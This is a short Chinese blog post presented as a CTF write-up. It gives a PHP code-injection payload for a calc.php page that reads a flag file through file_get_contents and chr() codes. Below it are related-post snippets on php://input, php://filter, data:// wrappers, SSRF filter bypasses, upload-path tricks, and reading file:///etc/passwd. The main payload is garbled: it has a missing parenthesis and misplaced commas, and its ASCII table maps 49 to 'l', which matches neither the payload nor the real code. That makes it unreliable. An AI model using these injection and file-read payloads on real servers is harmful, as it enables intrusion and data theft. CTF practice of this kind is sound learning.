CTF-file_get_contents()

最新推荐文章于 2025-04-24 15:42:07 发布
原创 最新推荐文章于 2025-04-24 15:42:07 发布 · 694 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#php

文章探讨了在PHP代码中使用`file_get_contents`函数和`chr`函数对包含ASCII编码的payload进行处理,展示了如何解析并访问特定字符的URL路径。

 /calc.php?%20num=1;var_dump(file_get_contents(chr47).chr(102),chr(97),chr(103),chr(103)))

 其中的playload为ASCII码,对应如下:
//        chr(47)='/'
//        chr(102)='f'
//        chr(49)='l'
//        chr(97)='a'
//        chr(103)='g'
//        chr(103)='g'

 

 

xiukc
关注
【网络安全 | CTF】攻防世界 Web_php_include【php伪协议|data伪协议|file伪协议】
等风来
05-22 1万+
PHP 语言中一个重要的文件包含机制,可以将一个 PHP 文件包含到另一个 PHP 脚本文件中。该机制通常用于代码复用和模块化开发,在不同的 PHP 文件之间实现函数和类等代码的共享。file 伪协议用于访问本地文件系统中的文件,可以在 web 页面中链接到本地文件,或者读取本地文件中的数据。PHP 伪协议是一种特殊的 URI 协议,可以绕过通常的协议限制,直接访问本地文件和执行 PHP 代码。函数,该函数返回当前工作目录的绝对路径。函数,该函数返回当前执行的 PHP 脚本所在位置的绝对路径。
NSSCTF 2nd WEB
ytl_storm的博客
09-25 1421
当我们上传test.php/.这样的文件时候,因为file_put_contents()第一个参数是文件路径,操作系统会认为你要在test1.php文件所在的目录中创建一个名为.的文件,最后上传的结果就为test.php。这里绕过的主要原理是Tornado模板在渲染时会执行__tt_utf8(__tt_tmp) 这样的函数,所以将__tt_utf8设置为eval,然后将__tt_tmp设置为了从POST方法中接收的字符串导致了RCE。为具体的某个算法,则密钥是不能为空的。猜测这里存在SSRF漏洞。
每天一道ctf
whisper921的博客
11-13 1054
构造:data://text/plain,welcome to the zjctf,为了绕过某些过滤,这里用到base64编码。然后有一个可控参数file,构造file=useless.php,但是针对php文件我们需要进行base64编码,否则读取不到其内容,所以构造payload:file=php://filter/read=convert.base64-encode/resource=useless.php。结果为:O:4:"Flag":1:{s:4:"file";
CTF--file_get_contents
2401_83809941的博客
04-24 539
php://input: 允许访问请求的原始数据(POST 请求)允许将数据嵌入到 URL 中,通常用于内联数据( GET请求)php://filter: 允许对文件内容进行流式过滤。通过get方式传入,$ac和$fn相等才能返回flag。file_get_contents()函数。用于访问压缩文件中的内容。
CTFHub-file_get_contents
鸣蜩十四的博客
08-09 1799
extract() 方法可用于将数组展开,键名作为变量名,元素值为变量值,简单的说,就是能够直接将 $_POST 和 $_GET 中的变量解析出来,不需要我们手工赋值处理。 trim()去除字符串首尾处的空白字符 file_get_contents()将整个文件读入一个字符串 php://input可以访问请求的原始数据的只读流,在POST请求中访问POST的data部分,在enctype=“multipart/form-data” 的时候php://input 是无效的。 我们先对代码进行分析,而全部代.
20210218CTF伪协议绕过file_get_contents(bugkuctf的web21御结冰城感想)
热门推荐
qq_45290991的博客
02-18 1万+
CTF中常用的php伪协议利用 </h1> <div class="clear"></div> <div class="postBody"> file://# 作用: 用于访问文件(绝对路径、相对路径、网络路径) 示例: http://www.xx.com?file=file:///etc/passswd ph...
bugku never_give_up file_get_contents()php://input漏洞 eregi \x00绕过
YouthBelief的博客
03-07 3279
bugku never_give_up0x00 never_give_up0x01 解题流程1.1查看首页 及源码1.2 访问1p.html1.3解码1.4 分析代码1.5 payload 0x00 never_give_up 0x01 解题流程 1.1查看首页 及源码 发现一个页面 访问 1.2 访问1p.html 自动跳转到主页 直接查看源码 得到JS代码 其中申明 words变量 和OutWord()方法 将 escape解码后的words变量写入页面中。 words 变量 经过 url编码
ssrf绕过filter_var函数使用file_get_contents读取任意文件
Firebasky的博客
09-27 3330
前几天师傅给我发了一个ssrf的题目,是一个比赛题目,但是也一直没有拿下,就是可以执行xss,但是flag存在根目录下面,要需要读取文件,百度了一下没有发现新思路。在之后师傅给我提供了新思路。 1. ssrf绕过filter_var函数使用file_get_contents读取任意文件 直接上源代码 <?php highlight_file(__FILE__); $argv[1]=$_GET['a']; if(filter_var($argv[1],FILTER_VALIDATE_URL)) {.
[BJDCTF2020]ZJCTF,不过如此--preg_mach绕过,file_get_contents绕过
cainiao17441898的博客
05-25 563
前言: 绕过file_get_contents 绕过preg_mach 解题:
PolarD&amp;N-CTF-web方向-困难_polard&amp;n 没人能拒绝猫猫 ctf
2301_82257383的博客
05-04 1312
而由于flag.php在源码中已经被包含了,我们直接输出flag这个变量就可以,因为一般都是在php执行中给flag这个变量赋值的,最终payload:然后就得到了flag。
BugkuCTF-WEB题file_get_contents
am_03的博客
08-29 7399
知识点 empty() 函数用于检查一个变量是否为空。empty() 判断一个变量是否被认为是空的。当一个变量并不存在,或者它的值等同于 FALSE,那么它会被认为不存在。如果变量不存在的话,empty()并不会产生警告。 extract()函数从数组里将变量导入到当前的符号表。extract函数:可以进行变量覆盖。 语法:extract(array,extract_rules,prefix) 该函数使用数组键名作为变量名,使用数组键值作为变量值。针对数组里的各元素,将在当前符号表里创建对应的一个变量。第二
CG CTF WEB file_get_contents
无限迭代中......
07-04 2813
http://chinalover.sinaapp.com/web23/ 题意:get一个file参数到file_get_contents()函数里,如果返回为指定字符串,就得到了flag。 <!--$file = $_GET['file']; if(@file_get_contents($file) == "meizijiu"){ echo $nctf; }--> 题...
CG-CTF web之 file_get_contents
silence1_的博客
05-15 1万+
CG-CTF web之 file_get_contents 题目: 题目为file_get_contents,是一个php函数 进入题目,什么也没有,查看F12查看源码,得到提示源码, 大概看一下代码,意思是get一个file参数到file_get_contents()函数里,如果返回为指定字符串,就得到了flag。 这里涉及到一个file_get_contents()函数,而这个函数是可以绕过...
Bugku CTF_Web——file_get_contents
weixin_71914594的博客
10-27 905
看到file_get_contents就想到用php://input。Get传输ac再用fn读取数据。试了一下火狐的hackbar。一改Post就传输不过去。
CG CTF file_get_contents
qq_46389295的博客
02-24 1651
题目链接 <!--$file = $_GET['file']; if(@file_get_contents($file) == "meizijiu"){ echo $nctf; }--> file_get_contents存在变量覆盖漏洞
轻松通过file_get_contents题目(Bugku CTF
m0_63602484的博客
04-10 1921
a.这里需要打开burpsuite进行抓包,将抓取的数据包send to repeater,然后在重发器选项卡中进行编辑。b.只需要在GET/后面添加?ac=flag&fn=php://input,然后在数据包末尾添加flag即可。根据代码提示,这里我们构造php伪协议代码,并借助Burpsuite来修改数据包。c.最后发送请求,在右侧响应里面即可得到正确的flag。
CTF Web】Pikachu SSRF(file_get_content) Writeup(SSRF+读取文件)
HEX9CF的技术博客
10-16 779
其形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能,但又没有对目标地址做严格过滤与限制导致攻击者可以传入任意的地址来让后端服务器对其发起请求,并返回对该目标地址请求的数据数据流:攻击者----->服务器---->目标地址根据后台使用的函数的不同,对应的影响和利用方法又有不一样PHP中下面函数的使用不当会导致SSRF:如果一定要通过后台服务器远程去对用户指定(“或者预埋在前端的请求”)的地址进行资源请求,则请做好目标地址的过滤。
CG CTF-Web-file_get_contents
feng的博客
09-08 1192
WP 进入环境后先发现什么都没有,我们f12查看源码,会发现代码,因此进行代码审计: <!--$file = $_GET['file']; if(@file_get_contents($file) == "meizijiu"){ echo $nctf; }--> 我们可以发现这题有一个file_get_contents函数。因为我们要get一个file,而且他的内容还要是meizijiu,我一开始想到了文件包含相关的内容,想到了php的一些伪协议。这时候我上网查file_get_con
file_get_contents 的使用
toume的博客
07-07 649
1,使用file_get_contents函数请求链接不会跳到请求的链接 return file_get_contents($url.'?'.$get);//$url是你要请求的连接,$get是你请求传过去的数据
ctf得到源代码<?php if(isset($_POST['file'])){ $data = file_get_contents($_POST['file']); echo "File contents: $data";} highlight_file(__FILE__); error_reporting(0); ?>接下来怎么做
最新发布
11-02
CTF竞赛中,当我们获得一段PHP源代码后,需要仔细分析代码逻辑,寻找...> **关键提示**:在真实CTF中,注意检查`file_get_contents()`是否受`allow_url_fopen=On`配置影响,这决定了能否使用URL类攻击[^1][^4]。 ---
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值